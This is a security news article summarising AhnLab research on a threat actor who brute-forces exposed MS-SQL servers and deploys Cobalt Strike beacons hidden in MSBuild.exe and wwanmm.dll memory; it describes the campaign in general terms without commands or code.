Hackers distribute Cobalt Strike to unpatched MS-SQL server instances

Hackers distribute Cobalt Strike to unpatched MS-SQL server instances

Image:
Hackers distribute Cobalt Strike to unpatched MS-SQL server instances

Most attacks were likely conducted by the same threat actor, the researchers believe

Hackers are trying to deploy the Cobalt Strike adversary simulation tool on vulnerable internet-facing Microsoft SQL (MS SQL) server instances as part of a new campaign that aims to steal confidential information from compromised machines.

The warning comes from researchers at AhnLab Security Emergency Response Center (ASEC) who say they have seen multiple logs of Cobalt Strike over the past month.

Cobalt Strike is a commercial penetration testing platform that enables a tester to install a 'Beacon' agent on a target machine, allowing remote access to the system.

It was developed as a security tool to emulate attacks on networks, but now a wide range of threat actors use cracked versions of the software to find weaknesses in companies' networks to deliver secondary payloads, such as ransomware.

According to the researchers, the attackers looking to hack MS-SQL server typically scan port 1433 to check for instances that are publicly available. Then they attempt to log in using brute force or dictionary attacks against the admin account.

Even if the MS-SQL server isn't accessible, malware like LemonDuck can be used to scan port 1433 and enable lateral movement within the internal network. Threat actors also use CoinMiner malware such as Vollgar and Kingminer to target MS-SQL server.

"Cobalt Strike that has recently been discovered was downloaded through cmd.exe and powershell.exe via the MS-SQL process," the researchers said in a report published on Monday.

They found that the malware used by threat actors is an injector that decodes the encrypted Cobalt Strike within before executing and injecting the normal program MSBuild.exe.

Cobalt Strike, when run in MSBuild.exe, includes an additional setting to circumvent detection by security software, where it loads the regular dll wwanmm.dll, then writes and runs a beacon in the dll's memory space.

The beacon that receives the attacker's command and conducts the malicious behaviour can easily bypass memory-based detection as it does not reside in a suspicious memory area and instead runs in the standard module wwanmm.dll.

Over the last month, AhnLab's ASD infrastructure has revealed a slew of Cobalt Strike logs, according to the researchers, who believe most of the attacks were conducted by the same threat actor, considering the fact that the download URLs and the Command and Control server URL are similar.